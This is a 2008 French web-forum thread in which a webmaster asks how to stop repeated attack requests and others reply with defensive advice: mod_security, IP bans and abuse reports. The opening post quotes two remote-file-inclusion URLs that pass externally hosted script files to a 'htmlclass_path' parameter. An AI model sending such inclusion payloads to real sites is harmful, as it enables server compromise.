Index
Forums
Annuaire
Référencement
Télécharger
  phpBB SEO : Référencement Google, MSN, Yahoo, Annuaires, Forums  
phpBB SEO
Boards
Directory  
SEO  
Downloads
 
  Rechercher Search
    S'enregistrer
Pseudo :  Passe :  Auto  
Register  
 
   
Tentatives de hack de mon site

 
Poster un nouveau sujet   Répondre au sujet    phpBB SEO » Forum Référencement  » Sécurité informatique
::  
Auteur Message
ibost
PR5
PR5


Inscrit le: 15 Avr 2007
Messages: 502

Tentatives de hack de mon sitePosté le: Sam Juin 14, 2008 5:32 am    Sujet du message: Tentatives de hack de mon site

Bonjour.

Cela fait maintenant plus d'une semaine qu'une personne ou un robot essaie de hacker mon site. Je n'arrête pas de recevoir des notifications d'erreurs 404. L'URL recherché est toujours de la même forme :

Exemples :

1) [RACINE DE MON SITE]/webmaster-phphtml/phphtml.php?htmlclass_path=http://www.geocities.com/dinarisma/new.gif???

2) [RACINE DE MON SITE]/phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt?

Savez-vous comment je peux arrêter ces [$^ù$^ù#"&] ???

Merci.

_________________
Interim Informatique | Trucs et astuces maison
Revenir en haut de page
Visiter le site web de l'utilisateur
hawk88
PR2
PR2


Inscrit le: 05 Jan 2007
Messages: 265

Tentatives de hack de mon sitePosté le: Sam Juin 14, 2008 8:28 am    Sujet du message: Re: Tentatives de hack de mon site

Bonjour,

il fait plusieurs attaques à la seconde ?

Comme tu es en dédié il y a le mod_evasive et le mod security qui peuvetn être utile

_________________
Toufoot.com Pronostics Football || Jeu-Arcade.net Jeux d'arcade flash
Revenir en haut de page
Visiter le site web de l'utilisateur
ibost
PR5
PR5


Inscrit le: 15 Avr 2007
Messages: 502

Tentatives de hack de mon sitePosté le: Sam Juin 14, 2008 8:30 am    Sujet du message: Re: Tentatives de hack de mon site

Je sais pas ce qu'il essaie de faire mais je pense qu'il croit que j'utilise Joomla...

_________________
Interim Informatique | Trucs et astuces maison
Revenir en haut de page
Visiter le site web de l'utilisateur
SeO
Administrateur - Site Admin
Administrateur - Site Admin


Inscrit le: 15 Mar 2006
Messages: 3821

Tentatives de hack de mon sitePosté le: Sam Juin 14, 2008 9:00 am    Sujet du message: Re: Tentatives de hack de mon site

Il y a à priori peu de chances que ce genre d'attaque passent, sauf de faire tomber le serveur momentanément par surcharge et encore.

Par précaution, tu peux tout de même essayer de voir quels ip sont utilisées pour ces urls, et s'il n'y en a pas trop, les bannir quelques temps ...

Et si tu es motivé => hack / spam report au fournisseur de l'ip, tu peux trouver les contact par le Whois => http://www.dnsstuff.com/

Un bon mail avec les logs concernés, ça peut avoir quelques conséquences sur l'auteur en fonction du propriétaire de l'ip Wink

_________________
phpBB SEO || SEO Forum || Forum Référencement
GYM Sitemap & RSS for phpBB3 has been released ! || GYM Sitemap & RSS for phpBB3 est disponible !
Revenir en haut de page
ibost
PR5
PR5


Inscrit le: 15 Avr 2007
Messages: 502

Tentatives de hack de mon sitePosté le: Sam Juin 14, 2008 10:14 am    Sujet du message: Re: Tentatives de hack de mon site

Hm.... intéressant ! Cool

_________________
Interim Informatique | Trucs et astuces maison
Revenir en haut de page
Visiter le site web de l'utilisateur
rapha-35



Inscrit le: 16 Mai 2008
Messages: 21

Tentatives de hack de mon sitePosté le: Sam Juin 14, 2008 4:30 pm    Sujet du message: Re: Tentatives de hack de mon site

Salut, je ne m'y connais pas trop, mais il exploite une soit disant faille de ton site pour te faire executer ce fichier :http://www.motociclismo.pt/images/Equipa/jpg.txt

Je ne parviens pas a savoir ce qu'il peut faire
Revenir en haut de page
SeO
Administrateur - Site Admin
Administrateur - Site Admin


Inscrit le: 15 Mar 2006
Messages: 3821

Tentatives de hack de mon sitePosté le: Sam Juin 14, 2008 6:22 pm    Sujet du message: Re: Tentatives de hack de mon site

mm, c'est une collection de petites fonctions pour hacker le serveur, dans le cas ou il y aurai des droits d'exécution dans le dossier.
Si tu as ça, c'est qu'a priori quelqu'un a réussi à le mettre là, si c'est pas toi, il est temps de bien vérifier ton site et ta db, histoire de voir si ce fichier a été utilisé ou pas.
Faudrait aussi restreindre les accès le plus possible au dossier dans le quel ce fichier est apparu.

_________________
phpBB SEO || SEO Forum || Forum Référencement
GYM Sitemap & RSS for phpBB3 has been released ! || GYM Sitemap & RSS for phpBB3 est disponible !
Revenir en haut de page
ibost
PR5
PR5


Inscrit le: 15 Avr 2007
Messages: 502

Tentatives de hack de mon sitePosté le: Sam Juin 14, 2008 7:36 pm    Sujet du message: Re: Tentatives de hack de mon site

Je ne connais pas ce fichier ni ce site... d'ailleurs il n'utilise pas seulement ce seul site, ils passent par plein d'autres sites !

_________________
Interim Informatique | Trucs et astuces maison
Revenir en haut de page
Visiter le site web de l'utilisateur
SeO
Administrateur - Site Admin
Administrateur - Site Admin


Inscrit le: 15 Mar 2006
Messages: 3821

Tentatives de hack de mon sitePosté le: Dim Juin 15, 2008 12:38 pm    Sujet du message: Re: Tentatives de hack de mon site

ibost a écrit:
Je ne connais pas ce fichier ni ce site... d'ailleurs il n'utilise pas seulement ce seul site, ils passent par plein d'autres sites !


De quoi tu parles Rolling Eyes

_________________
phpBB SEO || SEO Forum || Forum Référencement
GYM Sitemap & RSS for phpBB3 has been released ! || GYM Sitemap & RSS for phpBB3 est disponible !
Revenir en haut de page
ibost
PR5
PR5


Inscrit le: 15 Avr 2007
Messages: 502

Tentatives de hack de mon sitePosté le: Dim Juin 15, 2008 1:08 pm    Sujet du message: Re: Tentatives de hack de mon site

Je parle de sites hébergés sous Geocities ou des sites en noms de domaines propres. Enfin bref je vais essayer de bloquer leur IP.

Merci !

_________________
Interim Informatique | Trucs et astuces maison
Revenir en haut de page
Visiter le site web de l'utilisateur
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    phpBB SEO » Forum Référencement  » Sécurité informatique
Page 1 sur 1

Navigation Autres sujets de discussion

Sauter vers: